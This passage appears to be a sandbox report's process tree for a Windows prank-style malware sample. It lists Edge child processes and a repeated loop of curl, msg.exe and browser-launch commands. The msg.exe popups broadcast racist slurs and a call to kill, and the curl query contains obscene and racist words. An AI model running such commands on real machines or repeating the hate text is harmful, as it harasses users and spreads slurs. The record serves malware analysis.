        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=10996,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=11348 /prefetch:1
        6⤵
        
        PID:400
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=5708,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5720 /prefetch:1
        6⤵
        
        PID:6608
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --always-read-main-dll --field-trial-handle=11624,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=11156 /prefetch:1
        6⤵
        
        PID:6980
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=11908,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=11952 /prefetch:1
        6⤵
        
        PID:6504
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=12116,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12144 /prefetch:1
        6⤵
        
        PID:924
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=10860,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12152 /prefetch:1
        6⤵
        
        PID:6912
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=12272,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12148 /prefetch:1
        6⤵
        
        PID:280
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --always-read-main-dll --field-trial-handle=12312,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12344 /prefetch:1
        6⤵
        
        PID:6704
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=12572,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12560 /prefetch:1
        6⤵
        
        PID:6324
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=12524,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12684 /prefetch:1
        6⤵
        
        PID:5736
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=12540,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12868 /prefetch:1
        6⤵
        
        PID:6288
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --always-read-main-dll --field-trial-handle=6208,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:1
        6⤵
        
        PID:6304
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --always-read-main-dll --field-trial-handle=8240,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=13116 /prefetch:1
        6⤵
        
        PID:6404
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --always-read-main-dll --field-trial-handle=5728,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12984 /prefetch:1
        6⤵
        
        PID:7300
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --always-read-main-dll --field-trial-handle=13304,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=13332 /prefetch:1
        6⤵
        
        PID:7536
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --always-read-main-dll --field-trial-handle=13484,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=13520 /prefetch:1
        6⤵
        
        PID:7804
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2248,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=9036 /prefetch:2
        6⤵
        
        PID:8064
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=7972,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=6744 /prefetch:2
        6⤵
        
        PID:7236
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --always-read-main-dll --field-trial-handle=3956,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=8468 /prefetch:2
        6⤵
        
        PID:7248
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --always-read-main-dll --field-trial-handle=13704,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5680 /prefetch:2
        6⤵
        
        PID:7280
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2920
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3528
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3660
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5704
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3404
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3444
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3704
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4872
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5060
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4376
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5752
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:1516
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:604
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:852
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2604
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3900
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5880
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5720
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:812
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:884
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5664
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3952
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3532
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1744
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2936
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4504
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:876
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1348
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3512
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4164
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5944
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2956
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3000
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1376
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2676
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:1136
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4792
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:292
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:924
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:1536
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:268
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4480
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4596
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4856
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3700
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3696
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5652
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3552
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2144
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4176
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5560
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3320
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5152
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4256
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3392
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1724
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4508
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:664
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2960
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3624
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2564
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2680
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1188
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3512
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4596
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3836
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3948
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3840
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5364
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5056
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5952
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4560
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5124
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4400
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2844
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4016
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:876
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:1500
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:1828
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2584
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4552
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4412
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1536
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5408
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4684
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:2816
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5920
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3468
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5080
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4688
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5812
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4600
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:1248
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3928
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:920
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2268
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2484
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2324
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3888
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:432
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6112
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6048
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2700
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2904
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5432
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5056
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4748
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3988
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:1452
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5392
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5884
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3952
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3532
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:276
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2152
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:668
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2992
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:408
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2700
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3528
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5920
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5804
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:60
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5608
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5392
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5816
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4236
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3888
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3656
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4404
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4596
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3020
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2904
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5080
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5628
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5816
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3300
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:624
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2932
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1988
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2992
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4448
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4560
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4120
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2900
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5628
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5064
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6000
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4508
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1452
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:876
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4232
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:400
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
